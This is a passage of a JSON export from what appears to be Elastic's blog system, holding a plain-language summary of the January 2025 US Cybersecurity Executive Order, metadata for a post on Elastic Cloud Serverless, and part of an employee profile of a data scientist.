owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs83bd614490a36f2d"}}}],"publish_date":"2024-12-02","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"AWS","label_l10n":"AWS","keyword":"aws","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt5da20aee1a072f80","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:30.685Z","updated_at":"2023-11-06T20:08:30.685Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:00:52.463Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt736c21c9cc3bed67","ACL":{},"created_at":"2023-11-06T20:35:30.489Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-regions","label_l10n":"Cloud regions","tags":[],"title":"Cloud regions","updated_at":"2023-11-06T20:35:30.489Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.290Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltf9e60b72b67d3eca","_version":1,"title":"serverless-cloud-blog (2).png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-25T17:12:04.879Z","updated_at":"2024-11-25T17:12:04.879Z","content_type":"image/png","file_size":"87889","filename":"serverless-cloud-blog_(2).png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:29:38.628Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf9e60b72b67d3eca/6744afe45a3b4339a435bb76/serverless-cloud-blog_(2).png"},"title":"Do less with serverless: Elastic Cloud Serverless — Now GA","title_l10n":"Do less with serverless: Elastic Cloud Serverless — Now GA","updated_at":"2025-01-16T23:50:20.749Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elastic-cloud-serverless","publish_details":{"time":"2025-01-16T23:55:15.411Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbaa25e325a2b74b8","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"President Biden issued his Cybersecurity Executive Order in the final days of his administration, outlining a number of measures to enhance national cybersecurity with an emphasis on CISA and safeguarding federal systems and critical infrastructure.","author":["blt4912a365604f6024"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2025-01-16T19:22:32.538Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs37a2038c146703c7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePresident Biden has issued his long-awaited \u003c/span\u003e\u003ca href=\"https://www.whitehouse.gov/briefing-room/presidential-actions/2025/01/16/executive-order-on-strengthening-and-promoting-innovation-in-the-nations-cybersecurity/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eCybersecurity Executive Order\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This directive comes in the final days of the administration and outlines a number of measures to enhance national cybersecurity — placing a strong emphasis on the Cybersecurity and Infrastructure Security Agency (CISA) and its important role in safeguarding federal systems and critical infrastructure. The lengthy order also emphasizes the importance of securing critical services and capabilities essential to the digital domain, including efforts to enhance the security of the software supply chain and federal systems, which are increasingly targeted by \u003c/span\u003e\u003ca href=\"https://www.cisa.gov/news-events/news/strengthening-americas-resilience-against-prc-cyber-threats\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esophisticated cyber attacks\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Securing the software supply chain","_metadata":{"uid":"csc3df91d50be109b2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo address vulnerabilities in software development and deployment, the order offers several measures:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCompliance and transparency:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Software providers to the government must submit written attestations and artifacts that demonstrate their software development practices were secure.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGuidance development:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e A consortium will be established to provide comprehensive guidance for implementing secure software practices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUpdated standards:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The National Institute of Standards and Technology (NIST) will update its guidance on secure software development, including patch deployment and supply chain risk management.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOpen source security:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The order addresses the use of open source software in federal information systems, ensuring its security and reliability.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Enhancing security of federal systems","_metadata":{"uid":"cs3e0f9b83cb204c2e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA central feature of the Executive Order is the modernization of federal cybersecurity practices with a close focus on strengthening CISA’s capabilities. In an era of growing threats, including ransomware attacks on critical infrastructure and espionage targeting federal systems, these enhancements aim to position CISA to be a more proactive defender of federal agencies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKey initiatives include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eExpanded threat-hunting capabilities:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The order mandates that CISA gain timely access to data from endpoint detection and response (EDR) solutions and security operation centers across federal agencies. This will improve its ability to detect and mitigate threats like advanced persistent threats (APTs) and nation-state cyber intrusions, such as the recent Volt Typhoon campaign.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTechnical capability development:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Within 180 days, CISA must develop the technical capability to access data from agencies’ EDR solutions in coordination with the Federal CIO and CISO Councils.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOperational frameworks:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e CISA will draft a comprehensive concept of operations to streamline data access and threat response, outlining requirements for data provision, notification procedures, and specific use cases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCollaboration with providers:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e CISA will establish working groups to develop technical controls in partnership with EDR solution providers to ensure seamless implementation in Federal Civilian Executive Branch (FCEB) deployments.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy enhancing its threat-hunting capabilities, CISA will be better equipped to counter evolving cyber risks.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Modernized security practices","_metadata":{"uid":"cs2b48d2b12c84df83"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdditional directives for federal agencies include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdopting phishing-resistant authentication measures\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEnhancing cloud security through updated FedRAMP policies\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStrengthening cybersecurity for space systems and infrastructure\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Securing federal communications","_metadata":{"uid":"cs50223d8ca1b7870a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe order emphasizes robust measures to secure communications systems, including:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInternet routing security: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eImplementing technologies like Route Origin Authorizations\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEncrypted traffic protection:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Mandating encrypted DNS traffic and secure email transport while encouraging end-to-end encryption\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSecure digital communication:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Advancing the security of internet-based voice, video conferencing, and instant messaging\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePost-quantum cryptography: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ePreparing for the transition to post-quantum cryptographic standards and securing cryptographic key management\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Combating cybercrime and fraud","_metadata":{"uid":"csc9b87f340693bb18"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Executive Order addresses the growing threat of cybercrime by:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePromoting the acceptance of digital identity documents in public benefits programs with an emphasis on privacy and security\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDeveloping a pilot program to notify individuals of potential identity fraud\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEncouraging the use of “Yes/No” validation services for identity verification\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Using AI for cybersecurity","_metadata":{"uid":"cse978b365a4b8724b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRecognizing the transformative potential of artificial intelligence, the order highlights:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLaunching a pilot program to apply AI in defending critical infrastructure, particularly in the energy sector\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEstablishing programs to use AI models for advanced cyber defense\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePrioritizing funding for AI research in cybersecurity and supporting the development of large-scale datasets for research purposes\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Strengthening cybersecurity policy","_metadata":{"uid":"cs9d8e2985b2337814"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Executive Order directs the modernization of IT infrastructure and alignment of policies to improve network security. Key actions include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIssuing updated Office of Management and Budget (OMB) guidance\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEstablishing minimum cybersecurity practices for government contractors\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Countering malicious cyber activities","_metadata":{"uid":"cs26c9e571705cdd84"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuilding on previous directives, the order expands the criteria for sanctions against individuals involved in significant cyber-enabled activities, such as ransomware attacks and unauthorized access to critical infrastructure. The updated criteria will empower the Treasury Department to designate and impose sanctions to help deter cyber threats.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What’s to come","_metadata":{"uid":"cs1b06570af882b513"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePresident Biden’s Cybersecurity Executive Order marks a significant development in addressing the increasing complexities of the cyber threat landscape. By emphasizing CISA’s expanded role and modernizing federal cybersecurity practices, the order seeks to mitigate risks and enhance resilience. While the long-term impact remains to be seen, this comprehensive order represents a substantial effort to protect the nation’s digital infrastructure and critical systems against evolving threats.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the coming years, Elastic remains committed to partnering with public sector organizations to facilitate secure AI implementation as well as to provide technology solutions that strengthen the security of critical data and systems. Our ongoing collaboration with CISA and the Continuous Diagnostics and Monitoring (CDM) program continues to provide visibility and security across US federal agencies, and we look forward to continuing to enhance this protection in accordance with this Executive Order.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs713ff2d5f8c6037d"}}},{"callout":{"title_l10n":"Related resources:","_metadata":{"uid":"csfb35215d212d8910"},"paragraph_l10n":"\u003cul\u003e\n \u003cli\u003e\n \u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog: \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/public-sector-cdms-data-strategy\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat the public sector can learn from CDM’s data strategy\u003c/span\u003e\u003c/a\u003e\n \u003c/li\u003e\n \u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eWebinar: \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/virtual-events/microsoft-artificial-intelligence\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eResponsible AI adoption: AI and the regulatory environment\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs31f97b0274ea2b19"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc357012fadf2b0a9"}}}],"publish_date":"2025-01-16","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","uid":"bltc6e3d049760fc06a","title":"Government","label_l10n":"Government","keyword":"government","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:32.959Z","updated_at":"2023-11-06T20:40:32.959Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.338Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5ebb3c17304b01bc","ACL":{},"created_at":"2023-11-06T20:47:38.117Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"privacy-first-ai","label_l10n":"Privacy-first AI","tags":[],"title":"Privacy-first AI","updated_at":"2023-11-06T20:47:38.117Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:58.404Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt77841d6b4501e415","_version":1,"title":"Elastic Banner_7.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-16T19:17:20.299Z","updated_at":"2025-01-16T19:17:20.299Z","content_type":"image/jpeg","file_size":"127175","filename":"Elastic_Banner_7.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-16T19:24:20.241Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt77841d6b4501e415/67895b4034a94339f9795195/Elastic_Banner_7.jpg"},"title":"Biden's new Cybersecurity Executive Order: What you need to know","title_l10n":"Biden's new Cybersecurity Executive Order: What you need to know","updated_at":"2025-01-16T19:24:10.257Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/biden-cybersecurity-executive-order","publish_details":{"time":"2025-01-16T19:24:19.687Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2c25f10b097486bd","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Before coming to Elastic, Almudena Sanz Olivé was the only woman on her team at her first data science job.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2025-01-10T05:52:34.549Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs95ccc8ba906a649c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBefore coming to Elastic, Almudena Sanz Olivé was the only woman on her team at her first data science job.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I joined with a group of people and some people treated me a bit differently. It was the first time I was like, ‘Hey, what’s happening?,’” she says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile she’d been the minority before, this was the first time it was noticeable, Almudena says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“This has never happened to me again. When I’ve had to hire people, I see more and more CVs from women.”\u003cbr /\u003e\u003cbr /\u003eAlmudena grew up around female role models who worked in tech or tech-adjacent fields. Her mom is a civil engineer and many of her aunts and uncles are also in engineering. So, Almudena was used to seeing women in tech roles.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt seven years old, Almudena built her first website with her dad’s help. She would also regularly go to her grandparents house and rebuild electronics in their garage. On top of that, her dad was a math teacher and gave her math problems to solve.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I feel like it came naturally to me to solve these problems and think about things this way,” she says. “You see patterns, and you come up with ways to solve them.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThat way of thinking would come in handy later in her career as a data scientist. But Almudena first went to school for electronics engineering, which she describes as a mix of electric engineering and computer science.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“When I had to choose a degree, my family asked me what I was thinking of pursuing. They asked if I had considered engineering because I’m good at cracking problems, and I like tech a lot,” Almudena says. “[My family] gave me the idea to go into engineering. When someone tells you it’s a possibility, it’s easier to consider it.”\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDuring her junior year, she studied abroad in California and took an artificial intelligence course.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I thought that [AI] was interesting as well,” Almudena says. “It gave me a foundation. I studied a lot of stats, math, and data.”\u003cbr /\u003e\u003cbr /\u003eNow, Almudena is a principal data scientist working on Elastic’s observability analytics team.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“We make sense of the telemetry data that our customers use,” she says. “We collect that, and we use data engineering processes to shape it into a way that we can use it and make sense from it.”\u003cbr /\u003e\u003cbr /\u003eThis includes building dashboards for models and working with internal stakeholders to understand how the product is being used.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“A big part of data science is explaining complex things,” Almudena says. “You have to be able to communicate well — that’s one of the most critical skills. You have to be able to explain things and be a teacher. I really enjoy that part of it.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAlmudena has also had the opportunity to work with the AI assistant team to build a framework to understand how Elastic customers are using AI assistants and evaluate the quality and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/culture-problem-solving-skills-gen-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eaccuracy of AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“I love tools that help people understand their data. We use [machine learning] and AI in the background, so people can better understand their data.”\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAlmudena found the part of tech she really loved. For others interested in joining the tech industry, she recommends finding what motivates you.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Tech is just a tool. It’s the means to an end. Figure out what motivates you to find answers for people. Find what gives you energy and take that path,” she says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are many ways to get to what motivates you, she says. Almudena’s first jobs weren’t in data science — she moved into the field later in her career because it’s what interested her the most. And she encourages other women to do what feels natural to them.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“There are many ways to add value,” she says. “Do what feels natural to you. I’m a bit more observant — I like to observe and then add more once I see the dynamics. You don’t have to be anyone else. Just be yourself.”\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShe also recommends finding mentors like she had growing up. “Find people that you relate to. Find a mentor and a support system.”\u003cbr /\u003e\u003cbr /\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eInterested in a career in tech? 